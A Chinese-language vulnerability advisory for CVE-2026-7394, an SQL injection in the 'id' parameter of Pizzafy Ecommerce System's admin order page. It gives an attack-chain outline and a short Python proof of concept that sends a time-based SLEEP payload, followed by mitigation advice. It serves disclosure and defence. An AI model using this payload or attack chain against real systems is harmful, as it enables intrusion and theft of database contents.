CVE-2026-7394 Pizzafy电商系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-7394

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本中的/admin/view_order.php文件存在SQL注入漏洞。由于GET参数处理组件中存在未知功能的处理缺陷，攻击者可以通过操纵ID参数来执行恶意的SQL语句。该漏洞需要高权限（管理员）才能利用，且攻击可远程发起。成功利用此漏洞可能导致敏感信息泄露、数据完整性受损以及系统可用性降低。目前该漏洞的利用细节已被公开披露，建议相关用户尽快采取补救措施。

技术细节

该漏洞根源在于SourceCodester Pizzafy Ecommerce System 1.0版本在处理订单查看功能时的安全编码缺失。具体文件为/admin/view_order.php，系统在接收GET请求中的“ID”参数时，未实施有效的输入验证机制，直接将其嵌入到SQL查询语句中。这种不安全的编程方式允许攻击者通过构造特定的SQL Payload（如单引号闭合、UNION联合查询等）来干扰原始查询逻辑。虽然CVSS向量显示需要高权限（PR:H），意味着攻击者需先获取管理员账号，但一旦进入后台，利用此漏洞即可绕过应用逻辑，直接与数据库交互。攻击者可利用此漏洞读取管理员密码哈希、用户隐私信息等敏感数据，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察与定位

攻击者识别出目标系统正在运行SourceCodester Pizzafy Ecommerce System 1.0，并确定受影响的端点为/admin/view_order.php。

STEP 2

获取凭证

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他漏洞获取管理员后台登录凭证。

STEP 3

构造Payload

攻击者构造包含恶意SQL语句的Payload，针对GET参数“ID”进行设计，例如使用UNION SELECT语句提取数据。

STEP 4

执行攻击

攻击者在浏览器或使用工具发送带有恶意Payload的HTTP GET请求至目标服务器。

STEP 5

数据泄露

服务器执行恶意SQL命令，将数据库中的敏感信息（如用户表、管理密码）返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    """
    Proof of Concept for CVE-2026-7394
    Tests the 'id' parameter in /admin/view_order.php
    """
    # Payload to test for time-based blind or error-based injection
    # Adjust the payload based on the specific database backend (MySQL likely)
    payload = "?id=1' AND (SELECT SLEEP(5))-- -"
    
    full_url = f"{target_url}/admin/view_order.php{payload}"
    
    try:
        print(f"Sending request to: {full_url}")
        response = requests.get(full_url, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[+] Potential SQL Injection vulnerability detected (Time-based).")
        else:
            print("[-] No immediate response delay detected. Try manual testing.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://localhost"
    check_sqli(target)

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

在官方未发布补丁前，建议管理员通过Web应用防火墙（WAF）添加规则，拦截对/admin/view_order.php的异常请求参数。同时，应加强后台管理员的身份验证机制，防止未授权访问，并定期检查数据库是否存在异常数据访问记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7394
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7394
3 Details https://www.cvedetails.com/cve/CVE-2026-7394/
4 VulDB https://vuldb.com/cve/CVE-2026-7394
5 Link https://github.com/Xmyronn/SQL-Injection-in-Pizzafy-Ecommerce-System-admin-view_order.php.git
6 Link https://vuldb.com/submit/803523
7 Link https://vuldb.com/vuln/360119
8 Link https://vuldb.com/vuln/360119/cti
9 Link https://www.sourcecodester.com/